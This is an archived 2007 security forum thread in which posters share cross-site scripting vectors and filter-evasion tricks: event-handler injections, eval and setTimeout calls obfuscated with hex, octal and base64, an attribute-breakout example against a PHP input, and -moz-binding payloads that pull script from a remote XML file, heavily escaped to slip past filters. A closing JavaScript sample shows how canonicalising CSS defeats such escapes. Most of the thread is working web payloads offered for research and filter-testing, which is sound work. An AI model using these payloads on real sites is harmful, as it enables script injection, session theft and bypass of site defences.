Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 2 of 16
Re: New XSS vectors
Posted by: Anonymous User
Date: October 17, 2007 08:05AM

This one isn't really big news but nice for filter circumvention

<img src \/onerror = alert(2)

Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 17, 2007 10:32AM

Filter evasion string creation:-
alert(uneval(/eval/).replace(/\//g, [ ] ));

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 17, 2007 01:54PM

try this in FF:-
alert(atob('amF2YXNjcmlwdDphbGVydCgxKQ'));

Looks like FF has inbuilt base64 encoding...:)

Re: New XSS vectors
Posted by: Anonymous User
Date: October 17, 2007 03:09PM

Yep - a to b and b to a are some good ol' Netscape relics.

http://developer.mozilla.org/en/docs/DOM:window.atob

Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 17, 2007 03:38PM

Ah cool, I didn't know; that makes some things a lot easier in FF with those functions :)

Sorry if this was common knowledge

Re: New XSS vectors
Posted by: Anonymous User
Date: October 17, 2007 11:27PM

Yep they thought about us lazy asses! ^^

Re: New XSS vectors
Posted by: Anonymous User
Date: November 06, 2007 02:36AM

typeof setTimeout('alert(this)',0)
or
typeof setTimeout('\x61\x6c\x65\x72\x74\x28\x31\x29',0)

Edited 1 time(s). Last edit at 11/06/2007 02:37AM by .mario.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 06, 2007 03:13AM

Nice :D

Re: New XSS vectors
Posted by: Anonymous User
Date: November 06, 2007 08:37AM

And even more timeout and eval fun

new Function('\141\154\145\162\164\50\61\51')();

eval('(' + typeof setTimeout + '(){ alert(1) })()');

Re: New XSS vectors
Posted by: Anonymous User
Date: November 14, 2007 04:53AM

top/**/['\x61\x6c\x65\x72\x74']/**/(1)

No new technique - just beautiful :)

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 14, 2007 05:03AM

yeah vector poetry :D

Re: New XSS vectors
Posted by: Anonymous User
Date: November 14, 2007 04:49PM

Here's some vector haiku:


the cycle it closes
the message is sent
at last

(ä=#1={}&&alert)(ä)

Edited 2 time(s). Last edit at 12/01/2007 04:01PM by .mario.

Re: New XSS vectors
Posted by: Anonymous User
Date: November 21, 2007 03:45AM

Today's vector haiku:


we eval
we eval it twice
to get around the corner


<style>
body:after{
content: "\61\6c\65\72\74\28\31\29"
}
</style>
<script>
eval(eval(document.styleSheets[0].cssRules[0].style.content))
</script>

Edited 1 time(s). Last edit at 12/01/2007 04:01PM by .mario.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 21, 2007 05:43AM

Simply awesome Mario! How about that for an obscure payload :) cool!

Re: New XSS vectors
Posted by: divine
Date: November 21, 2007 07:37AM

Sorry to get off-topic... I'm new here... but isn't the difficult part of XSS also to inject the script tag? I mean, all these vectors are amazing, but what's the use case? (attaching them only to onLoad events, javascript:, etc.?)



Edited 2 time(s). Last edit at 11/21/2007 07:58AM by divine.

Re: New XSS vectors
Posted by: Anonymous User
Date: November 21, 2007 08:41AM

@divine:

There's no practical use case. This thread is just to show new ways of executing JavaScript. Maybe it might help in one or another case, but the point is more like 'learn to know your browser - and be surprised at what input he (or she?) accepts'.

The last haiku showed that CSS accepts 'shortened' Unicode entities in the content property, close to but not the same as the JS octal/hexadecimal entities - and something else: if you paste that code in a local HTML file and try to select the rendered text with the Firebug HTML Inspector, you will notice that the stuff doesn't seem to exist (maybe a reason for the double eval). So this might turn out in some cases to be a circumvention vector for client-side WAF applications.



Edited 2 time(s). Last edit at 11/21/2007 08:59AM by .mario.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 21, 2007 08:48AM

@divine

Experimenting with ways of injecting payloads can find new vectors and different ways of exploiting a system. Anyone writing a filter needs to know this information because simply blocking <> won't suffice.

Injecting an XSS string isn't the difficult part as far as I'm concerned; the difficult part is understanding how code can be injected in the various ways.

So I don't mind the question and I understand your point completely, but let's agree to use this thread for new vectors only, because I think it's a useful learning reference for people wanting to learn new ways to exploit XSS in JavaScript, CSS and whatever else.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 21, 2007 08:53AM

<image src="" onerror="alert(/XSS/)" />
<image src="http://somedomain/somegraphic.jpg" onload="alert(/XSS/)" />
<p onmousemove="alert(/XSS/)">Long paragraph here</p>
<var onmousemove="alert(/XSS/)">Long paragraph here</var>
and so on...

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 21, 2007 09:16AM

Here's a stealthy one :)

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="alert(/XSS/)" onclick="alert(/XSS/)"></div>

and a fun huge button :)
<button style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="alert(/XSS/)" onclick="alert(/XSS/)"></button>

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 21, 2007 10:21AM

The input image can also be used for XSS as shown on rsnake's cheat sheet, but it states it only works on certain browsers; you can get round this by using:-

<input type="image" src="x" onerror="alert(/XSS/)" />

Thinking about the one above, it could be useful where a site doesn't specify the type attribute, e.g.

<input name="test" value="<?php echo $_GET['test']?>" />

?test=" type="image" src="x" onerror="alert(/XSS/)

Edited 1 time(s). Last edit at 11/21/2007 10:39AM by Gareth Heyes.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 25, 2007 09:34AM

MozBinding fun:-

<Q%^&*(£@!'" style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&
#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&
#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&
#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&
#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115
&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92
&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>

<div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
#x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
#x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
#x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
#x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
&#x23&#x78&#x73&#x73&#x29>

<div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

Re: New XSS vectors
Posted by: klaus
Date: November 25, 2007 01:37PM

<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

Gareth, how do you use this?!



Edited 1 time(s). Last edit at 11/25/2007 01:38PM by klaus.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 25, 2007 01:43PM

You need to make sure it's on one line first, then you require an external XML file like this:-
http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss

Note the #xss; this is required to point to the relevant id in the XML file. Moz binding only works on Firefox. You could use it with tag injection like "><div/style etc. or with an attribute like " style=" etc.

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 25, 2007 07:30PM

Further mozbinding:-
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 25, 2007 07:48PM

And yeah this also works...

<x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)>

Why mozilla? Why? LOL

Re: New XSS vectors
Posted by: Anonymous User
Date: November 25, 2007 07:52PM

jaw drops...

Re: New XSS vectors
Posted by: klaus
Date: November 25, 2007 11:23PM

Any real-world example on a website vulnerable to those new vectors? How do you test?

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 26, 2007 03:22AM

@klaus

Please look into mozbinding to learn how to use the latest vectors:-
http://developer.mozilla.org/en/docs/CSS:-moz-binding

Re: New XSS vectors
Posted by: Gareth Heyes
Date: November 26, 2007 06:44AM

I've made it easy to construct this kind of CSS attack using my tool Hackvertor:-
<div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>>

Re: New XSS vectors
Posted by: ma1
Date: November 26, 2007 07:54AM

Gareth Heyes Wrote:
-------------------------------------------------------
> Why mozilla? Why? LOL

http://www.w3.org/TR/CSS21/syndata.html#characters

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

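Gareth's point that simply blocking a few characters won't suffice, .mario's note on CSS's own escape syntax, and ma1's pointer to the CSS 2.1 escape rules all say the same thing to a filter author: match what the browser will see, not the raw bytes. The block below is an added example, not code from this thread or from Hackvertor: a canonicaliser that resolves HTML numeric references and CSS escapes (CSS 2.1 syndata section 4.1.3) and then runs one property blocklist over both the raw and the decoded value, assuming escaped NULs are dropped as the posted vectors show Firefox of the time did.

```javascript
// Added example (not code from the thread): canonicalise a style value the way
// the HTML parser and then the CSS tokenizer (CSS 2.1, syndata section 4.1.3)
// would, so a filter matches what the browser sees rather than the raw bytes.
// Assumption: an escaped NUL (\0, \000000) is dropped, as the vectors above show
// Firefox did at the time; CSS Syntax Level 3 maps it to U+FFFD instead.

// Numeric character references, with or without the trailing ';' (HTML parsers
// accept both), are resolved before the attribute value ever reaches CSS.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (m, n) => {
    const cp = /^x/i.test(n) ? parseInt(n.slice(1), 16) : parseInt(n, 10);
    return cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
  });
}

// CSS escapes: "\" + 1..6 hex digits (+ one optional whitespace) is a code
// point; "\" + any other character stands for that character itself.
function decodeCssEscapes(s) {
  return s.replace(/\\([0-9a-f]{1,6})(\r\n|[ \t\r\n\f])?|\\(.)/gis, (m, hex, ws, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    if (cp === 0) return '';                       // assumption stated above
    return cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
  });
}

function canonicalCss(s) {
  return decodeCssEscapes(decodeNumericEntities(s)).replace(/\0/g, '').toLowerCase();
}

// A raw-string blocklist (what "simply blocking" looks like) versus the same
// check on the canonical form. 'behavior' is IE's counterpart of -moz-binding.
const BLOCKED = /(^|[\s;{])(-moz-binding|behavior)\s*:/;
function naiveHit(s) { return BLOCKED.test(s.toLowerCase()); }
function canonicalHit(s) { return BLOCKED.test(canonicalCss(s)); }

// Samples: the first two are the escaped forms posted above, the last one is
// constructed here (decimal and hex references mixed, no semicolons).
const VEC_ESCAPED = '\\-\\mo\\z\\-b\\i\\nd\\in\\g:\\url(//business\\i\\nfo.co.uk\\/labs\\/xbl\\/xbl\\.xml\\#xss)';
const VEC_NUL = '-m\\0o\\0z\\0-b\\0i\\0nd\\0i\\0n\\0g\\0:\\0u\\0r\\0l\\0(\\0/\\0/b\\0u\\0s\\0i\\0ne\\0s\\0s\\0i\\0nf\\0o\\0.c\\0o\\0.\\0u\\0k\\0/\\0la\\0b\\0s\\0/\\0x\\0b\\0l\\0/\\0x\\0b\\0l\\0.\\0x\\0m\\0l\\0#\\0x\\0s\\0s\\0)';
// Six-digit variant: a spec-following decoder reads "\0b" as the two-digit hex
// escape U+000B, so only the padded form decodes to the clean URL; both must be
// canonicalised before matching, and the property name is visible in either.
const VEC_NUL6 = VEC_NUL.replace(/\\0/g, '\\000000');
const VEC_ENTITY = '&#92&#45&#x6D&#x6F&#122&#45&#98&#105&#110&#100&#105&#110&#103:url(x)';

for (const v of [VEC_ESCAPED, VEC_NUL, VEC_NUL6, VEC_ENTITY]) {
  console.log(naiveHit(v), canonicalHit(v), JSON.stringify(canonicalCss(v)));
}
```

For every sample the raw blocklist reports no hit while the canonical check does; this is the decode step a server-side or client-side filter needs, and it is still weaker than an allowlist of permitted properties.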